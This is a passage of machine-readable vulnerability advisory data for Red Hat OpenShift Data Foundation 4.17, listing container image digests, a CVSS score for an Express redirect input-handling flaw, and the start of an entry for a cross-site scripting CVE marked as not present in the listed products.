"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", 